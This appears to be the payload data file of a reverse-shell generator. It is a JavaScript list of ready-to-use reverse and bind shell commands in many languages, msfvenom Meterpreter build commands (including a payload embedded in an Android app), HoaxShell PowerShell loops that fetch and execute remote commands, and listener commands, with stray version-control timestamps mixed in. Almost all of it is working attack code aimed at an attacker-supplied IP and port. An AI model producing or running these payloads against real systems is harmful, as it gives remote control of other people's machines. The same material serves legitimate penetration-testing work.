"command" : "ruby -rsocket -e'exit if fork;c=TCPSocket.new(\"{ip}\",\"{port}\");loop{c.gets.chomp!;(exit! if $_==\"exit\");($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print io.read}))rescue c.puts \"failed: #{$_}\"}'" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "socat #1" ,
"command" : "socat TCP:{ip}:{port} EXEC:{shell}" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "socat #2 (TTY)" ,
"command" : "socat TCP:{ip}:{port} EXEC:'{shell}',pty,stderr,setsid,sigint,sane" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "node.js" ,
"command" : "require('child_process').exec('nc -e {shell} {ip} {port}')" ,
"meta" : [ "linux" , "mac" ]
2022-01-21 15:37:59 +00:00
} ,
{
"name" : "node.js #2" ,
"command" : "(function(){\r\n var net = require(\"net\"),\r\n cp = require(\"child_process\"),\r\n sh = cp.spawn(\"\{shell}\", []);\r\n var client = new net.Socket();\r\n client.connect({port}, \"{ip}\", function(){\r\n client.pipe(sh.stdin);\r\n sh.stdout.pipe(client);\r\n sh.stderr.pipe(client);\r\n });\r\n return \/a\/; \/\/ Prevents the Node.js application from crashing\r\n})();" ,
"meta" : [ "linux" , "mac" , "windows" ]
2021-09-09 12:03:42 +00:00
} ,
2021-09-21 11:49:25 +00:00
{
2021-09-09 12:03:42 +00:00
"name" : "Java #1" ,
2021-09-21 10:40:48 +00:00
"command" : "public class shell {\n public static void main(String[] args) {\n Process p;\n try {\n p = Runtime.getRuntime().exec(\"bash -c $@|bash 0 echo bash -i >& /dev/tcp/{ip}/{port} 0>&1\");\n p.waitFor();\n p.destroy();\n } catch (Exception e) {}\n }\n}" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "Java #2" ,
"command" : "public class shell {\n public static void main(String[] args) {\n ProcessBuilder pb = new ProcessBuilder(\"bash\", \"-c\", \"$@| bash -i >& /dev/tcp/{ip}/{port} 0>&1\")\n .redirectErrorStream(true);\n try {\n Process p = pb.start();\n p.waitFor();\n p.destroy();\n } catch (Exception e) {}\n }\n}" ,
2021-09-09 12:03:42 +00:00
"meta" : [ "linux" , "mac" ]
} ,
2021-09-21 11:43:56 +00:00
{
"name" : "Java #3" ,
"command" : "import java.io.InputStream;\nimport java.io.OutputStream;\nimport java.net.Socket;\n\npublic class shell {\n public static void main(String[] args) {\n String host = \"{ip}\";\n int port = {port};\n String cmd = \"{shell}\";\n try {\n Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();\n Socket s = new Socket(host, port);\n InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();\n OutputStream po = p.getOutputStream(), so = s.getOutputStream();\n while (!s.isClosed()) {\n while (pi.available() > 0)\n so.write(pi.read());\n while (pe.available() > 0)\n so.write(pe.read());\n while (si.available() > 0)\n po.write(si.read());\n so.flush();\n po.flush();\n Thread.sleep(50);\n try {\n p.exitValue();\n break;\n } catch (Exception e) {}\n }\n p.destroy();\n s.close();\n } catch (Exception e) {}\n }\n}" ,
"meta" : [ "windows" , "linux" , "mac" ]
} ,
2022-03-19 20:44:03 +00:00
{
2022-01-21 14:16:57 +00:00
"name" : "Javascript" ,
"command" : "String command = \"var host = \'{ip}\';\" +\r\n \"var port = {port};\" +\r\n \"var cmd = \'{shell}\';\"+\r\n \"var s = new java.net.Socket(host, port);\" +\r\n \"var p = new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();\"+\r\n \"var pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();\"+\r\n \"var po = p.getOutputStream(), so = s.getOutputStream();\"+\r\n \"print (\'Connected\');\"+\r\n \"while (!s.isClosed()) {\"+\r\n \" while (pi.available() > 0)\"+\r\n \" so.write(pi.read());\"+\r\n \" while (pe.available() > 0)\"+\r\n \" so.write(pe.read());\"+\r\n \" while (si.available() > 0)\"+\r\n \" po.write(si.read());\"+\r\n \" so.flush();\"+\r\n \" po.flush();\"+\r\n \" java.lang.Thread.sleep(50);\"+\r\n \" try {\"+\r\n \" p.exitValue();\"+\r\n \" break;\"+\r\n \" }\"+\r\n \" catch (e) {\"+\r\n \" }\"+\r\n \"}\"+\r\n \"p.destroy();\"+\r\n \"s.close();\";\r\nString x = \"\\\"\\\".getClass().forName(\\\"javax.script.ScriptEngineManager\\\").newInstance().getEngineByName(\\\"JavaScript\\\").eval(\\\"\"+command+\"\\\")\";\r\nref.add(new StringRefAddr(\"x\", x);" ,
2022-01-21 15:37:59 +00:00
"meta" : [ "linux" , "mac" , "windows" ]
2022-01-21 14:16:57 +00:00
} ,
2022-03-19 20:44:03 +00:00
{
2021-10-19 19:08:00 +00:00
"name" : "Groovy" ,
"command" : "String host=\"{ip}\";int port={port};String cmd=\"{shell}\";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();" ,
"meta" : [ "windows" ]
} ,
{
2021-09-09 12:03:42 +00:00
"name" : "telnet" ,
"command" : "TF=$(mktemp -u);mkfifo $TF && telnet {ip} {port} 0<$TF | {shell} 1>$TF" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "zsh" ,
"command" : "zsh -c 'zmodload zsh/net/tcp && ztcp {ip} {port} && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "Lua #1" ,
"command" : "lua -e \"require('socket');require('os');t=socket.tcp();t:connect('{ip}','{port}');os.execute('{shell} -i <&3 >&3 2>&3');\"" ,
"meta" : [ "linux" ]
} ,
{
"name" : "Lua #2" ,
"command" : "lua5.1 -e 'local host, port = \"{ip}\", {port} local socket = require(\"socket\") local tcp = socket.tcp() local io = require(\"io\") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, \"r\") local s = f:read(\"*a\") f:close() tcp:send(s) if status == \"closed\" then break end end tcp:close()'" ,
"meta" : [ "linux" , "windows" ]
} ,
{
"name" : "Golang" ,
"command" : "echo 'package main;import\"os/exec\";import\"net\";func main(){c,_:=net.Dial(\"tcp\",\"{ip}:{port}\");cmd:=exec.Command(\"{shell}\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go" ,
"meta" : [ "linux" , "mac" , "windows" ]
} ,
2022-04-24 03:14:56 +00:00
{
"name" : "Vlang" ,
"command" : "echo 'import os' > /tmp/t.v && echo 'fn main() { os.system(\"nc -e {shell} {ip} {port} 0>&1\") }' >> /tmp/t.v && v run /tmp/t.v && rm /tmp/t.v" ,
"meta" : [ "linux" , "mac" ]
} ,
2021-09-09 12:03:42 +00:00
{
"name" : "Awk" ,
"command" : "awk 'BEGIN {s = \"/inet/tcp/0/{ip}/{port}\"; while(42) { do{ printf \"shell>\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \"exit\") close(s); }}' /dev/null" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "Dart" ,
"command" : "import 'dart:io';\nimport 'dart:convert';\n\nmain() {\n Socket.connect(\"{ip}\", {port}).then((socket) {\n socket.listen((data) {\n Process.start('{shell}', []).then((Process process) {\n process.stdin.writeln(new String.fromCharCodes(data).trim());\n process.stdout\n .transform(utf8.decoder)\n .listen((output) { socket.write(output); });\n });\n },\n onDone: () {\n socket.destroy();\n });\n });\n}" ,
"meta" : [ "linux" , "mac" , "windows" ]
2021-10-19 19:08:00 +00:00
}
2021-09-09 12:03:42 +00:00
]
) ;
2021-11-20 01:22:32 +00:00
// https://twitter.com/MuirlandOracle -- #Muiri Was Here :D
2021-09-09 12:03:42 +00:00
const bindShellCommands = withCommandType (
CommandType . BindShell ,
[
{
"name" : "Python3 Bind" ,
"command" : "python3 -c 'exec(\"\"\"import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind((\"0.0.0.0\",{port}));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())\"\"\")'" ,
"meta" : [ "bind" , "mac" , "linux" , "windows" ]
} ,
{
"name" : "PHP Bind" ,
"command" : "php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,\"0.0.0.0\",{port});\socket_listen($s,1);$cl=socket_accept($s);while(1){if(!socket_write($cl,\"$ \",2))exit;\$in=socket_read($cl,100);$cmd=popen(\"$in\",\"r\");while(!feof($cmd)){$m=fgetc($cmd);socket_write($cl,$m,strlen($m));}}'" ,
"meta" : [ "bind" , "mac" , "linux" , "windows" ]
}
]
) ;
const msfvenomCommands = withCommandType (
CommandType . MSFVenom ,
[
{
"name" : "Windows Meterpreter Staged Reverse TCP (x64)" ,
"command" : "msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f exe -o reverse.exe" ,
"meta" : [ "msfvenom" , "windows" , "staged" , "meterpreter" , "reverse" ]
} ,
{
"name" : "Windows Meterpreter Stageless Reverse TCP (x64)" ,
"command" : "msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST={ip} LPORT={port} -f exe -o reverse.exe" ,
"meta" : [ "msfvenom" , "windows" , "stageless" , "reverse" ]
} ,
{
"name" : "Windows Staged Reverse TCP (x64)" ,
2022-06-01 12:18:36 +00:00
"command" : "msfvenom -p windows/x64/shell/reverse_tcp LHOST={ip} LPORT={port} -f exe -o reverse.exe" ,
2021-09-09 12:03:42 +00:00
"meta" : [ "msfvenom" , "windows" , "staged" , "meterpreter" , "reverse" ]
} ,
{
"name" : "Windows Stageless Reverse TCP (x64)" ,
"command" : "msfvenom -p windows/x64/shell_reverse_tcp LHOST={ip} LPORT={port} -f exe -o reverse.exe" ,
"meta" : [ "msfvenom" , "windows" , "stageless" , "reverse" ]
} ,
{
"name" : "Linux Meterpreter Staged Reverse TCP (x64)" ,
"command" : "msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f elf -o reverse.elf" ,
"meta" : [ "msfvenom" , "linux" , "meterpreter" , "staged" , "reverse" ]
} ,
{
"name" : "Linux Stageless Reverse TCP (x64)" ,
"command" : "msfvenom -p linux/x64/shell_reverse_tcp LHOST={ip} LPORT={port} -f elf -o reverse.elf" ,
"meta" : [ "msfvenom" , "linux" , "meterpreter" , "stageless" , "reverse" ]
} ,
{
"name" : "Windows Bind TCP ShellCode - BOF" ,
"command" : "msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -f python -v notBuf -o shellcode" ,
"meta" : [ "msfvenom" , "windows" , "bind" , "bufferoverflow" ]
} ,
{
"name" : "macOS Meterpreter Staged Reverse TCP (x64)" ,
"command" : "msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f macho -o shell.macho" ,
"meta" : [ "msfvenom" , "mac" , "stageless" , "reverse" ]
} ,
{
"name" : "macOS Meterpreter Stageless Reverse TCP (x64)" ,
"command" : "msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST={ip} LPORT={port} -f macho -o shell.macho" ,
"meta" : [ "msfvenom" , "mac" , "stageless" , "reverse" ]
} ,
{
"name" : "macOS Stageless Reverse TCP (x64)" ,
"command" : "msfvenom -p osx/x64/shell_reverse_tcp LHOST={ip} LPORT={port} -f macho -o shell.macho" ,
"meta" : [ "msfvenom" , "mac" , "stageless" , "reverse" ]
} ,
{
"name" : "PHP Meterpreter Stageless Reverse TCP" ,
"command" : "msfvenom -p php/meterpreter_reverse_tcp LHOST={ip} LPORT={port} -f raw -o shell.php" ,
"meta" : [ "msfvenom" , "windows" , "linux" , "meterpreter" , "stageless" , "reverse" ]
} ,
{
"name" : "PHP Reverse PHP" ,
"command" : "msfvenom -p php/reverse_php LHOST={ip} LPORT={port} -o shell.php" ,
"meta" : [ "msfvenom" , "windows" , "linux" , "meterpreter" , "stageless" , "reverse" ]
} ,
{
"name" : "JSP Stageless Reverse TCP" ,
"command" : "msfvenom -p java/jsp_shell_reverse_tcp LHOST={ip} LPORT={port} -f raw -o shell.jsp" ,
"meta" : [ "msfvenom" , "windows" , "linux" , "meterpreter" , "stageless" , "reverse" ]
} ,
{
"name" : "WAR Stageless Reverse TCP" ,
2022-09-20 02:35:27 +00:00
"command" : "msfvenom -p java/shell_reverse_tcp LHOST={ip} LPORT={port} -f war -o shell.war" ,
2021-09-09 12:03:42 +00:00
"meta" : [ "msfvenom" , "windows" , "linux" , "stageless" , "reverse" ]
} ,
{
"name" : "Android Meterpreter Reverse TCP" ,
"command" : "msfvenom --platform android -p android/meterpreter/reverse_tcp lhost={ip} lport={port} R -o malicious.apk" ,
"meta" : [ "msfvenom" , "android" , "android" , "reverse" ]
} ,
{
"name" : "Android Meterpreter Embed Reverse TCP" ,
"command" : "msfvenom --platform android -x template-app.apk -p android/meterpreter/reverse_tcp lhost={ip} lport={port} -o payload.apk" ,
"meta" : [ "msfvenom" , "android" , "android" , "reverse" ]
} ,
2023-02-04 23:46:08 +00:00
{
"name" : "Apple iOS Meterpreter Reverse TCP Inline" ,
2023-02-04 23:50:43 +00:00
"command" : "msfvenom --platform apple_ios -p apple_ios/aarch64/meterpreter_reverse_tcp lhost={ip} lport={port} -f macho -o payload" ,
2023-02-04 23:46:08 +00:00
"meta" : [ "msfvenom" , "apple_ios" , "apple_ios" , "reverse" ]
} ,
2021-09-09 12:03:42 +00:00
{
"name" : "Python Stageless Reverse TCP" ,
2022-10-11 00:01:00 +00:00
"command" : "msfvenom -p cmd/unix/reverse_python LHOST={ip} LPORT={port} -f raw" ,
2021-09-09 12:03:42 +00:00
"meta" : [ "msfvenom" , "windows" , "linux" , "stageless" , "reverse" ]
} ,
{
"name" : "Bash Stageless Reverse TCP" ,
"command" : "msfvenom -p cmd/unix/reverse_bash LHOST={ip} LPORT={port} -f raw -o shell.sh" ,
"meta" : [ "msfvenom" , "linux" , "macos" , "stageless" , "reverse" ]
} ,
]
) ;
2023-02-15 20:02:38 +00:00
const hoaxShellCommands = withCommandType (
CommandType . HoaxShell ,
[
{
"name" : "Windows CMD cURL http" ,
"command" : "" ,
"meta" : [ "windows" ]
} ,
{
"name" : "PowerShell IEX http" ,
"command" : "$s='{IP}:{PORT}';$i='14f30f27-650c00d7-fef40df7';$p='http://';$v=IRM -UseBasicParsing -Uri $p$s/14f30f27 -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/650c00d7 -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=IEX $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/fef40df7 -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}" ,
"meta" : [ "windows" ]
} ,
{
"name" : "PowerShell IEX Constr Lang Mode http" ,
"command" : "$s='{IP}:{PORT}';$i='bf5e666f-5498a73c-34007c82';$p='http://';$v=IRM -UseBasicParsing -Uri $p$s/bf5e666f -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/5498a73c -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=IEX $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/34007c82 -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}" ,
"meta" : [ "windows" ]
} ,
{
"name" : "PowerShell Outfile http" ,
"command" : "$s='{IP}:{PORT}';$i='add29918-6263f3e6-2f810c1e';$p='http://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/add29918 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/6263f3e6 -Headers @{\"Authorization\"=$i});if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/2f810c1e -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}" ,
"meta" : [ "windows" ]
} ,
{
"name" : "PowerShell Outfile Constr Lang Mode http" ,
"command" : "$s='{IP}:{PORT}';$i='e030d4f6-9393dc2a-dd9e00a7';$p='http://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=IRM -UseBasicParsing -Uri $p$s/e030d4f6 -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/9393dc2a -Headers @{\"Authorization\"=$i}); if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/dd9e00a7 -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}" ,
"meta" : [ "windows" ]
} ,
{
"name" : "Windows CMD cURL https" ,
"command" : "" ,
"meta" : [ "windows" ]
} ,
{
"name" : "PowerShell IEX https" ,
"command" : "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{IP}:{PORT}';$i='1cdbb583-f96894ff-f99b8edc';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/1cdbb583 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/f96894ff -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/f99b8edc -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}" ,
"meta" : [ "windows" ]
} ,
{
"name" : "PowerShell Constr Lang Mode IEX https" ,
"command" : "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{IP}:{PORT}';$i='11e6bc4b-fefb1eab-68a9612e';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/11e6bc4b -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/fefb1eab -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/68a9612e -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}" ,
"meta" : [ "windows" ]
} ,
{
"name" : "PowerShell Outfile https" ,
"command" : "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{IP}:{PORT}';$i='add29918-6263f3e6-2f810c1e';$p='https://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/add29918 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/6263f3e6 -Headers @{\"Authorization\"=$i});if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/2f810c1e -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}" ,
"meta" : [ "windows" ]
} ,
{
"name" : "PowerShell Outfile Constr Lang Mode https" ,
"command" : "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{IP}:{PORT}';$i='e030d4f6-9393dc2a-dd9e00a7';$p='https://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=IRM -UseBasicParsing -Uri $p$s/e030d4f6 -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/9393dc2a -Headers @{\"Authorization\"=$i}); if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/dd9e00a7 -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}" ,
"meta" : [ "windows" ]
}
]
) ;
2021-09-09 12:03:42 +00:00
const rsgData = {
listenerCommands : [
[ 'nc' , 'nc -lvnp {port}' ] ,
2023-02-15 20:02:38 +00:00
[ 'busybox nc' , 'busybox nc -lp {port}' ] ,
2021-09-09 12:03:42 +00:00
[ 'ncat' , 'ncat -lvnp {port}' ] ,
2022-09-24 19:31:54 +00:00
[ 'ncat.exe' , 'ncat.exe -lvnp {port}' ] ,
2021-09-09 12:03:42 +00:00
[ 'ncat (TLS)' , 'ncat --ssl -lvnp {port}' ] ,
[ 'rlwrap + nc' , 'rlwrap -cAr nc -lvnp {port}' ] ,
2021-11-20 01:37:32 +00:00
[ 'rustcat' , 'rcat -lp {port}' ] ,
[ 'rustcat + Command History' , 'rcat -lHp {port}' ] ,
2021-09-09 12:03:42 +00:00
[ 'pwncat' , 'python3 -m pwncat -lp {port}' ] ,
[ 'windows ConPty' , 'stty raw -echo; (stty size; cat) | nc -lvnp {port}' ] ,
[ 'socat' , 'socat -d -d TCP-LISTEN:{port} STDOUT' ] ,
[ 'socat (TTY)' , 'socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:{port}' ] ,
[ 'powercat' , 'powercat -l -p {port}' ] ,
2023-02-15 20:02:38 +00:00
[ 'msfconsole' , 'msfconsole -q -x "use multi/handler; set payload {payload}; set lhost {ip}; set lport {port}; exploit"' ] ,
[ 'hoaxshell' , 'sudo python3 -c $(curl -s ) -t {payload}' ]
2021-09-09 12:03:42 +00:00
] ,
2022-12-23 18:12:51 +00:00
shells : [ 'sh' , '/bin/sh' , 'bash' , '/bin/bash' , 'cmd' , 'powershell' , 'pwsh' , 'ash' , 'bsh' , 'csh' , 'ksh' , 'zsh' , 'pdksh' , 'tcsh' , 'mksh' , 'dash' ] ,
2021-09-09 12:03:42 +00:00
upgrade : [ 'python' , ] ,
specialCommands : {
'PowerShell payload' : '$client = New-Object System.Net.Sockets.TCPClient("{ip}",{port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
} ,
reverseShellCommands : [
... reverseShellCommands ,
... bindShellCommands ,
2023-02-15 20:02:38 +00:00
... msfvenomCommands ,
... hoaxShellCommands
2021-09-09 12:03:42 +00:00
]
}
// Export the data for use within netlify functions / node
if ( typeof exports !== 'undefined' ) {
exports . rsgData = rsgData ;
}
2022-03-19 20:44:03 +00:00
// Export for use within the browser
if ( typeof window !== 'undefined' ) {
window . rsgData = rsgData ;
window . CommandType = CommandType ;
}
